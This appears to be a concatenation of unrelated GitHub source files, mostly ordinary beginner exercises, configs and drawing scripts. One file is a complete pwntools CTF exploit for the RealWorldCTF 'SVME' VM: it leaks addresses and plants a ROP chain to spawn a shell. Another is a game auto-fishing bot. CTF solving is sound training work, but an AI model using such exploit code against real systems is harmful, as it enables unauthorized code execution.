build_from_edges_in_csv(filename, from_id, to_id):\n g = gg.GeneralGraph()\n with open(filename, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=\",\")\n for row in reader:\n g.add_edge({\"_id\": row[from_id], \"data\": {}}, {\"_id\": row[to_id], \"data\": {}})\n return g\n####\n## Some tests\n#g = gg.GeneralGraph()\n#n1 = {\"_id\": \"first node\"}\n#n2 = {\"_id\": \"quick node three\", \"data\":[]}\n#n3 = {\"_id\": \"quick node four\", \"data\":[\"a\", \"b\", \"c\"]}\n#n4 = {\"_id\": \"quick sink\"}\n#n0 = {\"_id\": \"two\", \"data\":[]}\n#g.add_node(n1).add_node(n0)\n#g.add_edge({\"_id\": \"quick node 1\"},{\"_id\": \"quick node two\", \"data\":[]}, edge_data={})\\\n# .add_edge(n1, n2, edge_meaning=\"WORKS WITH\", edge_data={})\\\n# .add_edge(n1, n2, edge_meaning=\"WORKS WITH\", edge_data={\"some\": \"data\"})\\\n# .add_edge(n1, n3, edge_meaning=\"LIKES\")\\\n# .add_edge(n3, n4)\\\n# .add_edge(n0, n4)\n#\ng = build_from_edges_in_csv(\"/Users/simonshapiro/DataToGliffy/data/test.csv\", \"FROM\", \"TO\")\n#Attach gliffs based on some data on node and edge\nfor node in g.nodes.values():\n gnode = gliffs.GNode(node[\"_assignedItemId\"], description=node[\"_id\"], shape=gliffs.GLIFFY_SHAPES.COMPONENT)\n node[\"_gliff\"] = gnode\nfor edge in g.edges.values():\n gline = gliffs.GLine(edge[\"_assignedItemId\"], edge[\"_fromNode\"][\"_assignedItemId\"], edge[\"_toNode\"][\"_assignedItemId\"], edge[\"_edgeMeaning\"])\n edge[\"_gliff\"] = gline\n###\n#Layout the diagram\ndiagram = gliffs.GliffyDiagram()\ng = g.layout_using_grandalf()\ngliph_list = [node[\"_gliff\"].gliph for node in g.nodes.values()] + [edge[\"_gliff\"].gliph for edge in g.edges.values()]\ndiagram.diagram[\"stage\"][\"objects\"] = gliph_list\nprint(json.dumps(diagram.diagram))\npass","repo_name":"SimonShapiro/DataToGliffy","sub_path":"src/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12955551093","text":"#!/usr/bin/env python3\n\nfrom pwn import *\n\nthe_binary = \"./svme\"\n# the_binary = \"./svme.dbg\"\ncontext.binary = the_binary\nelf = context.binary\nlibc = ELF(\"./libc-2.31.so\", checksec=False)\n\ncontext.terminal = [\"tmux\", \"splitw\", \"-v\"]\n\nif args.REMOTE:\n io = remote(\"47.243.140.252\", 1337)\nelif args.STRACE:\n io = process([\"strace\", \"-o\" ,\"strace.txt\", the_binary])\nelif args.LTRACE:\n io = process([\"ltrace\", \"-o\", \"ltrace.txt\", the_binary])\nelse:\n io = process(the_binary)\n\nif args.GDB:\n gdb.attach(io, f\"\"\"\n file {the_binary}\n\n # Opcode jump table statement in vm_exec.\n # pie break *0x13a5\n\n # Return from vm_exec.\n pie break *0x19c0\n\n continue\n \"\"\")\n\nclass Opcodes:\n noop = 0\n iadd = 1 # int add\n isub = 2\n imul = 3\n ilt = 4 # int less than\n ieq = 5 # int equal\n br = 6 # branch\n brt = 7 # branch if true\n brf = 8 # branch if true\n iconst = 9 # push constant integer\n load = 10 # load from local context\n gload = 11 # load from global memory\n store = 12 # store in local context\n gstore = 13 # store in global memory\n print_ = 14 # print stack top\n pop = 15 # throw away top of stack\n call = 16 # call function at address with nargs,nlocals\n ret = 17 # return value from function\n halt = 18\n\nclass Const:\n max_program_size = 128\n\nclass Offsets:\n vm_first_stack_frame_locals_to_vm_globals = 0x116c // 4\n\n vm_globals_to_its_own_ptr = -0x20f0 // 4\n vm_globals_to_stack_ptr = -0x2100 // 4\n\n 
vm_first_stack_frame_to_overwrite_vm_globals_ptr = -0xf84 // 4\n\n stack_ptr_on_heap_to_main_ptr = 0x238 // 4\n stack_ptr_to_vm_exec_return_ptr = -0x28 // 4\n stack_ptr_to_stored_libc_start_main_ptr = 0x218 // 4\n\ndef signed_int32(i):\n return u32(p32(i), signed=True)\n\ndef split_qword(qword):\n upper_dword = (qword >> 0x20) & 0xffffffff\n upper_dword = signed_int32(upper_dword)\n\n lower_dword = qword & 0xffffffff\n lower_dword = signed_int32(lower_dword)\n\n return upper_dword, lower_dword\n\ndef set_vm_globals_ptr_from_stack():\n \"\"\"Set the vm->globals pointer from the top two dwords on the vm stack.\"\"\"\n return [\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr+1,\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr,\n ]\n\ndef gstore_qword(offset):\n return [\n Opcodes.gstore, offset+1,\n Opcodes.gstore, offset,\n ]\n\ndef gload_qword(offset):\n return [\n Opcodes.gload, offset,\n Opcodes.gload, offset+1,\n ]\n\ndef set_vm_globals_ptr_imm(qword):\n \"\"\"Set the vm->globals pointer to an immediate qword.\"\"\"\n upper_dword, lower_dword = split_qword(qword)\n return [\n Opcodes.iconst, upper_dword,\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr+1,\n Opcodes.iconst, lower_dword,\n Opcodes.store, Offsets.vm_first_stack_frame_to_overwrite_vm_globals_ptr,\n ]\n\ndef compile_program(program_opcodes):\n assert len(program_opcodes) <= Const.max_program_size\n for i in range(Const.max_program_size - len(program_opcodes)):\n program_opcodes.append(Opcodes.noop)\n\n return b\"\".join(p32(i, signed=True) for i in program_opcodes)\n\ndef parse_next_leaked_qword():\n io.recvuntil(\": print\")\n upper_dword = int(io.recvuntil(\"\\n\", drop=True))\n upper_dword = u32(p32(upper_dword, signed=True))\n\n io.recvuntil(\": print\")\n lower_dword = int(io.recvuntil(\"\\n\", drop=True))\n lower_dword = u32(p32(lower_dword, signed=True))\n\n return (upper_dword << 0x20) | lower_dword\n\nleaker_program = [\n # Load a stack address from the heap onto the top of the vm stack and print it.\n *gload_qword(Offsets.vm_globals_to_stack_ptr),\n Opcodes.print_,\n Opcodes.print_,\n\n # Load the stack address onto the top of the vm stack again.\n *gload_qword(Offsets.vm_globals_to_stack_ptr),\n\n # Overwrite the vm->globals pointer with the stack address.\n *set_vm_globals_ptr_from_stack(),\n\n # Load the stored __libc_start_main address onto the vm stack and print it.\n *gload_qword(Offsets.stack_ptr_to_stored_libc_start_main_ptr),\n Opcodes.print_,\n Opcodes.print_,\n\n # Load the address of main onto the vm stack and print it.\n *gload_qword(Offsets.stack_ptr_on_heap_to_main_ptr),\n Opcodes.print_,\n Opcodes.print_,\n\n # Load the address of main onto the vm stack again.\n *gload_qword(Offsets.stack_ptr_on_heap_to_main_ptr),\n\n # Store the address of main over the real program's vm_exec stored return address.\n *gstore_qword(Offsets.stack_ptr_to_vm_exec_return_ptr),\n\n # Trigger return from vm_exec.\n Opcodes.halt,\n]\nio.send(compile_program(leaker_program))\n\nstack_leak = parse_next_leaked_qword()\nlog.info(\"Stack leak: %#x\" % stack_leak)\n\nlibc_leak = parse_next_leaked_qword()\nlog.info(\"libc leak: %#x\" % libc_leak)\nlibc.address = libc_leak - 0x270b3\nlog.info(\"libc base: %#x\" % libc.address)\nlibc_bin_sh = next(libc.search(b\"/bin/sh\\x00\"))\nlog.info(\"Using libc /bin/sh string at %#x\" % libc_bin_sh)\n\nelf_leak = parse_next_leaked_qword()\nlog.info(\"ELF leak: %#x\" % elf_leak)\nelf.address = elf_leak - 
0x1c7b\nlog.info(\"ELF base: %#x\" % elf.address)\n\n# We send another program that overwrites the vm_exec stack with a ROP chain.\nrop_chain = [\n libc.address + 0x0000000000026b72, # pop rdi; ret\n libc_bin_sh,\n libc.sym.system,\n]\n\nexec_program = set_vm_globals_ptr_imm(stack_leak - 0x260)\nrop_offset = 0\nfor rop_qword in rop_chain:\n rop_upper_dword, rop_lower_dword = split_qword(rop_qword)\n\n exec_program.extend([\n Opcodes.iconst, rop_lower_dword,\n Opcodes.iconst, rop_upper_dword,\n ])\n exec_program.extend(gstore_qword(rop_offset))\n rop_offset += 2\nexec_program.append(Opcodes.halt)\n\nio.send(compile_program(exec_program))\nio.interactive()\n","repo_name":"welchbj/ctf","sub_path":"writeups/2022/RealWorldCTF/SVME/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"99"} +{"seq_id":"6740526604","text":"N = int(input('введите число: '))\n\nif N >= 2:\n l = [0]\n while(True):\n if 2 ** (l[-1] + 1) <= N:\n l.append(l[-1] + 1)\n else:\n break\n print(l)\nelse:\n print('нет подходящих степеней')","repo_name":"Nichitalik/python_GB","sub_path":"python_HomeWork2/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24214887704","text":"number = int(input())\nflag = True\ncounter = 0\n\nfor i in range(1, number + 1):\n for j in range(1, i + 1):\n counter += 1\n print(f\"{counter} \", end=\"\")\n if counter == number:\n flag = False\n break\n if not flag:\n break\n print()\n","repo_name":"EmilMominski/python_basics","sub_path":"Programming Basics/1. Python Basics/6. Nested Loops/Exercise/1_number_pyramid.py","file_name":"1_number_pyramid.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8952212371","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'post'\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('new_mood/', views.new_mood, name='new_mood'),\n path('remove_mood//', views.remove_mood, name='remove_mood'),\n path('edit_mood//', views.edit_mood, name='edit_mood')\n]\n","repo_name":"nguyenanhdocode/mood","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10317933467","text":"from typing import Optional, Dict, List, Any\nfrom itertools import product\nfrom paper.experiments.global_variables import TRAINING_DATASET_FRACTIONS\n\n\n########################################################################################################################\n# 4. APP.G.3 (Variants: Constant cool-down)\n########################################################################################################################\ndef experiments_variants_constant(exp_filter: Optional[Dict[str, float]] = None) -> List[Dict[str, Any]]:\n exp = [\n {\n \"experiment_name\": f\"exp_4_c{c}_x{x}_p{patience}\",\n \"a\": \"adaptive\",\n \"s\": \"bio\",\n \"c\": c,\n \"x\": x,\n \"prune_ratio_val\": x,\n \"lr_cooldown_epochs\": 0,\n \"patience\": patience,\n }\n for c, x, patience in product([\"II\", \"III\"], TRAINING_DATASET_FRACTIONS, [5, 7, 9])\n if (\"c\" not in exp_filter or c == exp_filter[\"c\"])\n and (\"x\" not in exp_filter or x == exp_filter[\"x\"])\n ]\n print(f\"4. 
EXPERIMENTS_VARIANTS_CONSTANT: {len(exp)} = \"\n f\"2 x {len(TRAINING_DATASET_FRACTIONS)} x 3\")\n return exp\n","repo_name":"flxst/nerblackbox","sub_path":"paper/experiments/experiments_appG3.py","file_name":"experiments_appG3.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"99"} +{"seq_id":"11505832013","text":"# Test the support for extension fields.\n\nImport(\"env\")\n\n# We use the files from the alltypes test case\nincpath = env.Clone()\nincpath.Append(PROTOCPATH = '$BUILD/alltypes')\nincpath.Append(CPPPATH = '$BUILD/alltypes')\n\nincpath.NanopbProto([\"extensions\", \"extensions.options\"])\nenc = incpath.Program([\"encode_extensions.c\", \"extensions.pb.c\", \"$BUILD/alltypes/alltypes.pb$OBJSUFFIX\", \"$COMMON/pb_encode.o\", \"$COMMON/pb_common.o\"])\ndec = incpath.Program([\"decode_extensions.c\", \"extensions.pb.c\", \"$BUILD/alltypes/alltypes.pb$OBJSUFFIX\", \"$COMMON/pb_decode.o\", \"$COMMON/pb_common.o\"])\n\nenv.RunTest(enc)\nenv.RunTest([dec, \"encode_extensions.output\"])\n\n","repo_name":"nanopb/nanopb","sub_path":"tests/extensions/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":3808,"dataset":"github-code","pt":"99"} +{"seq_id":"12491991444","text":"# coding:utf-8\r\n__author__ = \"superlaker\"\r\n__date__ = '2019/4/29 15:33'\r\n\r\n\"\"\"\r\ntimeout\r\nretry\r\nmethod\r\n\"\"\"\r\nimport requests\r\nfrom retrying import retry\r\n\r\nheaders = {}\r\n\r\n\r\n@retry(stop_max_attempt_number=3) # 三次出错抛出异常\r\ndef _parse_url(url, method, data, proxies):\r\n print(\"*\" * 20)\r\n if method == \"POST\":\r\n response = requests.post(url, data=data, headers=headers, proxies=proxies)\r\n\r\n else:\r\n response = requests.get(url, data=data, headers=headers, proxies=proxies)\r\n\r\n assert response.status_code == 200\r\n return response.content.decode()\r\n\r\n\r\ndef parse_url(url, method=\"GET\", data=None, proxies=None):\r\n try:\r\n html_str = _parse_url(url, method, data, proxies)\r\n except:\r\n html_str = None\r\n return html_str\r\n\r\n\r\nif __name__ == '__main__':\r\n url = \"http://www.baidussss.com\"\r\n url1 = \"http://www.baidu.com\"\r\n\r\n print(parse_url(url1))\r\n","repo_name":"lcdy/django_resume","sub_path":"static_media/static/markdown/python基础/06 net_spider/code/AI_timeout.py","file_name":"AI_timeout.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11512129355","text":"from PIL import ImageGrab\r\nimport time\r\nfrom pynput.mouse import Button, Controller\r\nimport keyboard\r\nimport win32api\r\nimport win32con\r\n\r\nmouse = Controller()\r\navg_time = 0.0\r\nthrow_time = 0.0\r\ncatch_time = 0.0\r\ntime_to_catch = 0.0\r\ntotal_time = 0.0\r\ncatch_number = 0\r\ntime_to_catch_string = \"\"\r\navg_time_string = \"\"\r\ncatch_number_string = \"\"\r\nexit_key = \"ctrl\"\r\nmouse_move_dir = True\r\n\r\n\r\ndef right_click():\r\n mouse.press(Button.right)\r\n mouse.release(Button.right)\r\n\r\n\r\nresolution = int(input(\"Resolution - 1920 × 1080, enter 0. For 2560 × 1440, enter 1. \"))\r\nwindow_scaling = int(input(\"Scaling - 100%, enter 0. For 125%, enter 1. \"))\r\nmove_mouse = bool(input(\"Enter any text to move the mouse while fishing. Skip to not move the mouse. 
\"))\r\n\r\nif resolution == 0:\r\n res = \"1920 × 1080\"\r\n if window_scaling == 0:\r\n x1, y1, x2, y2 = 1830, 948, 1832, 951\r\n scale = \"100%\"\r\n else:\r\n x1, y1, x2, y2 = 1819, 912, 1823, 914\r\n scale = \"125%\"\r\nelse:\r\n x1, y1, x2, y2 = 2470, 1309, 2472, 1311\r\n res = \"2560 × 1440\"\r\n scale = \"100%\"\r\n\r\nsetup_detect = ImageGrab.grab(bbox=(x1, y1, x2, y2))\r\nsetup_detect_rgb = setup_detect.convert(\"RGB\")\r\ninitial_r, initial_g, initial_b = setup_detect_rgb.getpixel((1, 1))\r\n\r\n\r\nwhile initial_r != 231:\r\n print(\"Please realign Volume Mixer window. Then, press ENTER to check its position again.\")\r\n input(\"Expected R = 231, Detected Value = \" + str(initial_r))\r\n setup_detect = ImageGrab.grab(bbox=(x1, y1, x2, y2))\r\n setup_detect_rgb = setup_detect.convert(\"RGB\")\r\n initial_r, initial_g, initial_b = setup_detect_rgb.getpixel((1, 1))\r\n\r\nprint(\"Success: Detected R value matches Expected R value.\")\r\nprint(f\"\\nCurrent configuration:\\n\"\r\n f\"Resolution: {res}\\n\"\r\n f\"Scale Ratio: {scale}\\n\"\r\n f\"Anti-overfishing: {move_mouse}\\n\")\r\ninput(\"Press ENTER to run script\")\r\nprint(\"Executing in 5 seconds... Ctrl + C to quit\")\r\ntime.sleep(1)\r\nprint(\"Executing in 4...\")\r\ntime.sleep(1)\r\nprint(\"Executing in 3...\")\r\ntime.sleep(1)\r\nprint(\"Executing in 2...\")\r\ntime.sleep(1)\r\nprint(\"Executing in 1...\")\r\ntime.sleep(1)\r\n\r\nright_click()\r\nthrow_time = time.time() # start timer\r\ntime.sleep(1)\r\nwhile True: # forever loop\r\n if keyboard.is_pressed(exit_key):\r\n exit(0)\r\n bobber_sound = ImageGrab.grab(bbox=(x1, y1, x2, y2)) # scan for Volume Meter\r\n bobber_sound_rgb = bobber_sound.convert(\"RGB\") # convert ImageGrab area to RGB\r\n r, g, b = bobber_sound_rgb.getpixel((1, 1)) # read pixel RGB values\r\n time.sleep(0.02) # scanning frequency\r\n if r == 51: # is sound detected?\r\n right_click() # catch fish\r\n catch_time = time.time() # end timer\r\n catch_number += 1 # increment number of catches by 1\r\n time_to_catch = catch_time - throw_time # end timer and save Δtime.time()\r\n total_time += time_to_catch # update total time spent fishing\r\n avg_time = total_time / catch_number # update average time per fish caught\r\n print(\"Catch \" + str(catch_number) + \": \" + str(round(time_to_catch, 2)) + \" | AVG: \" + str(round(avg_time, 2)))\r\n # print fishing stats TODO: Formatting\r\n time.sleep(0.75) # time delay between catch and recast rod\r\n if move_mouse:\r\n if mouse_move_dir:\r\n for i in range(160):\r\n win32api.mouse_event(win32con.MOUSEEVENTF_MOVE, 5, 0, 0, 0)\r\n mouse_move_dir = False\r\n else:\r\n for i in range(160):\r\n win32api.mouse_event(win32con.MOUSEEVENTF_MOVE, -5, 0, 0, 0)\r\n mouse_move_dir = True\r\n right_click() # cast fishing rod\r\n throw_time = time.time() # start timer\r\n time.sleep(2) # wait for volume meter to die down\r\n","repo_name":"goonmandu/pyautofish","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13802489456","text":"def number(arr):\n seen = set()\n for i in arr:\n if 2 * i in seen or i / 2 in seen:\n return True\n seen.add(i)\n return False\n\n\n\nif __name__ == '__main__':\n arr = [4,1,3,3]\n 
print(number(arr))","repo_name":"Prakashchater/Leetcode-array-easy-questions","sub_path":"leetcode1346.py","file_name":"leetcode1346.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14957567391","text":"#20210622\n#월간 코드 챌린지 시즌2\n\n\ndef solution(left, right):\n answer = 0\n \n for num in range(left, right+1):\n count = 0\n for n in range(1, num+1):\n if num%n == 0:\n count += 1\n \n if count % 2 == 0:\n answer += num\n else:\n answer -= num\n \n \n return answer\n","repo_name":"jeomn/Algorithms","sub_path":"programmers/Level1/약수의 개수와 덧셈.py","file_name":"약수의 개수와 덧셈.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"15155295907","text":"# -*- encoding: utf-8 -*-\r\n\r\nimport turtle\r\n\r\nclass _Init_Turtle:\r\n\tdef __init__(self, \r\n\t\troot, \r\n\t\tstartPosition = (-300, -100), \r\n\t\tcolor = 'black', \r\n\t\tspeed = 0, \r\n\t\twidthline = 1, \r\n\t\tshow = True,): \r\n\r\n\t\tself.startPosition = startPosition\r\n\t\tself.color = color\r\n\t\tself.speed = speed\r\n\t\tself.widthline = widthline\r\n\t\tself.show = show\r\n\r\n\t\tself.root = root\r\n\t\tif self.show == False:\r\n\t\t\tself.root.hideturtle()\r\n\t\tself.root.color(self.color)\r\n\t\tself.root.speed(self.speed)\r\n\t\tself.root.width(self.widthline)\r\n\r\n\t\tself.root.penup()\r\n\t\tself.root.setpos(self.startPosition)\r\n\t\tself.root.pendown()\r\n\r\nclass L_Sistem(_Init_Turtle):\r\n\tdef __init__(self, root):\r\n\t\t_Init_Turtle.__init__(self, root)\r\n\r\n\tdef _main_function(self, \r\n\t\t\t\t\t\t\t\t\t\taxiom:str, \r\n\t\t\t\t\t\t\t\t\t\titr:int, \r\n\t\t\t\t\t\t\t\t\t\tangl:int, \r\n\t\t\t\t\t\t\t\t\t\ttranslate:tuple, \r\n\t\t\t\t\t\t\t\t\t\tcondition='F', \r\n\t\t\t\t\t\t\t\t\t\ttwo_condition=None):\r\n\t\timport random\r\n\t\taxmTemp = ''\r\n\t\tdl = 7\r\n\t\tcolors = ['red', 'blue', 'purple', 'green']\r\n\r\n\t\tfor _ in range(itr):\r\n\t\t\tfor ch in axiom:\r\n\t\t\t\taxmTemp += translate[ch]\r\n\t\t\taxiom = axmTemp\r\n\t\t\t#print(axiom)\r\n\t\t\taxmTemp = ''\r\n\r\n\t\tfor ch in axiom:\r\n\t\t\tif ch == '+':\r\n\t\t\t\tself.root.left(angl)\r\n\t\t\telif ch == '-':\r\n\t\t\t\tself.root.right(angl)\r\n\t\t\telif ch == condition or two_condition:\r\n\t\t\t\tcolor = colors[random.randrange(0, 4)]\r\n\t\t\t\tself.root.color(color)\r\n\t\t\t\tself.root.forward(dl)\r\n\r\n\tdef Koch_curve(self):\r\n\t\taxiom = 'F'\r\n\t\titr = 4\r\n\t\tangl = 90\r\n\t\ttranslate = {'+':'+', '-':'-', 'F':'F+F-F-F+F'}\r\n\t\tself._main_function(axiom, itr, angl, translate)\r\n\r\n\tdef Dracon_curve(self):\r\n\t\tself.root.penup()\r\n\t\tself.root.home()\r\n\t\tself.root.pendown()\r\n\t\taxiom = 'FX'\r\n\t\titr = 10\r\n\t\tangl = 90\r\n\t\ttranslate={'+':'+', '-':'-', 'F':'F', 'X':'X+YF+', 'Y':'-FX-Y'}\r\n\t\tself._main_function(axiom, itr, angl, translate)\r\n\r\n\tdef Sierpinski_swept_curve(self):\r\n\t\taxiom = 'F'\r\n\t\titr = 8\r\n\t\tangl = 60\r\n\t\ttranslate = {'+':'+', '-':'-', 'F':'B-F-B', 'B':'F+B+F'}\r\n\t\tself._main_function(axiom, itr, angl, translate, two_condition='B')\r\n\r\n\tdef Sierpinski_triangle(self):\r\n\t\tself.root.penup()\r\n\t\tself.root.goto(-200, 300)\r\n\t\tself.root.pendown()\r\n\t\taxiom = 'F-G-G'\r\n\t\titr = 6\r\n\t\tangl = 120\r\n\t\ttranslate = {'+':'+', '-':'-', 'F':'F-G+F+G-F', 'G':'GG'}\r\n\t\tself._main_function(axiom, itr, angl, translate, two_condition='G')\r\n\r\n\r\ndef 
main():\r\n\troot = turtle.Turtle()\r\n\tfractal = L_Sistem(root)\r\n\tprint(type(fractal.Dracon_curve()))\r\n\tl_systems = {\r\n\t\t'Koch curve': 'Koch_curve()',\r\n\t\t'Dracon curve': 'Dracon_curve()',\r\n\t\t'Sierpinski swept curve': 'Sierpinski_swept_curve()',\r\n\t\t'Sierpinski triangle': 'Sierpinski_triangle()'\r\n\t}\r\n\r\n\tsystem = l_systems['Dracon curve']\r\n\tprint(type(system))\r\n\t#fractal.system\r\n\r\nif __name__ == '__main__':\r\n\twindow = turtle.Screen()\r\n\twindow.setup(750, 750)\r\n\tmain()\r\n\twindow.update()\r\n\twindow.mainloop()","repo_name":"Maxim-K96/L-Systems","sub_path":"classTurtle.py","file_name":"classTurtle.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18989872079","text":"\"\"\"``:sample_form`` command implementation.\"\"\"\nfrom ansible_navigator.action_base import ActionBase\nfrom ansible_navigator.app_public import AppPublic\nfrom ansible_navigator.configuration_subsystem.definitions import ApplicationConfiguration\nfrom ansible_navigator.ui_framework import Interaction\nfrom ansible_navigator.ui_framework import dict_to_form\nfrom ansible_navigator.ui_framework import form_to_dict\nfrom ansible_navigator.utils.serialize import yaml\n\nfrom . import _actions as actions\n\n\nFORM = \"\"\"\nform:\n title: Please confirm the following information\n fields:\n - name: construct\n prompt: Please name an Ansible construct\n type: text_input\n validator:\n name: one_of\n choices:\n - collection\n - playbook\n - role\n - plugin\n - name: ansible_fest\n prompt: In 2019, AnsibleFest was held in what city?\n default: Atlanta\n type: text_input\n validator:\n name: none\n - name: what_is\n prompt: In Rocannon's World, an \"ansible\" is an instantaneous communication device\n type: text_input\n validator:\n name: yes_no\n - name: rh_acquire\n prompt: What year did Red Hat acquire Ansible\n default: 2015\n type: text_input\n validator:\n name: something\n - name: ansible_24\n prompt: Was Ansible 2.4 released in 2018\n type: text_input\n validator:\n name: true_false\n - name: fc_result\n type: checkbox\n prompt: Ansible can automate\n options:\n - name: clouds\n text: Clouds\n - name: lightbulbs\n text: Lightbulbs\n - name: linux\n text: Linux servers\n - name: network\n text: Networks\n checked: True\n - name: windows\n text: Windows servers\n - name: nothing\n text: Nothing\n disabled: True\n max_selected: 4\n - name: fr_result\n type: radio\n prompt: The most popular network module is\n options:\n - name: cli_command\n text: ansible.netcommon.cli_command\n - name: cli_config\n text: ansible.netcommon.cli_config\n - name: nxos_interfaces\n text: cisco.nxos.nxos_interfaces\n - name: file_name\n type: text_input\n prompt: Provide a valid file path\n validator:\n name: valid_file_path\n pre_populate: /etc/hostname\n\"\"\"\n\n\n@actions.register\nclass Action(ActionBase):\n \"\"\"``:sample_form`` command implementation.\"\"\"\n\n KEGEX = r\"^sample_form$\"\n\n def __init__(self, args: ApplicationConfiguration):\n \"\"\"Initialize the ``:sample_form`` action.\n\n :param args: The current settings for the application\n \"\"\"\n super().__init__(args=args, logger_name=__name__, name=\"sample_form\")\n\n def run(self, interaction: Interaction, app: AppPublic) -> Interaction:\n \"\"\"Execute the ``:sample_form`` request for mode interactive.\n\n :param interaction: The interaction from the user\n :param app: The app instance\n :returns: The pending 
:class:`~ansible_navigator.ui_framework.ui.Interaction`\n \"\"\"\n self._logger.debug(\"sample form requested\")\n self._prepare_to_run(app, interaction)\n\n form_data = yaml.safe_load(FORM)\n form = dict_to_form(form_data[\"form\"])\n interaction.ui.show_form(form)\n as_dict = form_to_dict(form)\n self._logger.debug(\"form response: %s\", as_dict)\n\n while True:\n self._calling_app.update()\n next_interaction: Interaction = interaction.ui.show(obj=as_dict)\n if next_interaction.name != \"refresh\":\n break\n\n self._prepare_to_exit(interaction)\n return next_interaction\n","repo_name":"ansible/ansible-navigator","sub_path":"src/ansible_navigator/actions/sample_form.py","file_name":"sample_form.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"99"} +{"seq_id":"39719297186","text":"from typing import List, Dict\n\nfrom torch.utils.data import Dataset\n\nimport torch\n\n\nclass dispDataset(Dataset):\n def __init__(\n self,\n data: List[Dict],\n task = 'train'\n ):\n self.data = data\n self.task = task\n model_type = 'MiDaS_small'\n midas_transforms = torch.hub.load(\"intel-isl/MiDaS\", \"transforms\")\n if model_type == \"DPT_Large\" or model_type == \"DPT_Hybrid\":\n self.transform = midas_transforms.dpt_transform\n else:\n self.transform = midas_transforms.small_transform\n\n def __len__(self) -> int:\n return len(self.data)\n\n def __getitem__(self, index) -> Dict:\n instance = self.data[index]\n return instance\n\n def collate_fn(self, samples: List[Dict]) -> Dict:\n img_list = []\n disp_list = []\n\n for sample in samples:\n # don't have groundtruth for inference, use disp_list to store original image\n if self.task == 'train':\n disp_list.append(self.transform(sample['disp']))\n print(disp_list[-1].shape)\n else:\n disp_list.append(sample['img_path'])\n disp_list.append(sample['img'])\n\n img_list.append(self.transform(sample['img']))\n\n img_list = torch.stack(img_list).squeeze(1)\n\n if self.task == 'train':\n disp_list = torch.stack(disp_list).squeeze(1)\n\n return {'img' : img_list, 'disp' : disp_list}\n","repo_name":"pinya52/Stereo-from-Monocular-Image","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28394364909","text":"#Matthew Enarle BSCS 1-B\nfrom turtle import *\n\nbgcolor(\"black\")\nspeed(3000)\n\ndef drawRasengan():\n colors = ['yellow', 'orange', 'blue', 'silver']\n for line in range(180):\n penup()\n goto(0,0)\n pendown()\n left(1)\n for curve in range(4):\n if curve == 0:\n color( colors[0])\n elif curve == 1:\n color( colors[1])\n elif curve == 2:\n color( colors[2])\n elif curve == 3:\n color( colors[3])\n forward(50)\n left(50)\n\ndef drawShuriken():\n color(\"red\")\n penup()\n goto(100,92)\n pendown()\n for i in range(100):\n left(120)\n forward(i)\n backward(i%800)\n left(145)\n forward(200)\n\n\ndef drawCenter():\n penup()\n goto(-5,-5)\n pendown()\n for times in range(36):\n color(\"white\")\n speed(11)\n circle(20)\n left(170)\n left(20)\n forward(15)\n\ndrawShuriken()\ndrawCenter()\ndrawRasengan()\n\n\nhideturtle()\ndone()\n\n\n#shuriken source: https://www.youtube.com/watch?v=vAZ5CycYDtE\n#modified his design wherein the shuriken acts as the spikes of a beyblade, more specifically, edited the loop iteration and radius and the number of spikes\n\n#rasengan source: https://replit.com/@Roger_Lai/mega-rasengan\n#changed 
the colors of the rasengan to make it seem like the body of the blade\n\n","repo_name":"mattenarle10/epic1-midterm-output","sub_path":"beyblade.py","file_name":"beyblade.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36302023407","text":"from abc import ABC, abstractmethod\nfrom enum import Enum\n\n\nclass Attribute(Enum):\n ATTACK = 1\n DEFENSE = 2\n\n\nclass Query:\n def __init__(self, creature, attribute_type, attribute_initial_value):\n self.creature = creature\n self.attribute_type = attribute_type\n self.value = attribute_initial_value\n\n\nclass CreatureModifier(ABC):\n def __init__(self, creature):\n self.creature = creature\n\n @abstractmethod\n def handle(self, sender, query):\n pass\n\n\nclass Creature:\n def __init__(self, game, attack, defense):\n self.game = game\n self.initial_attack = attack\n self.initial_defense = 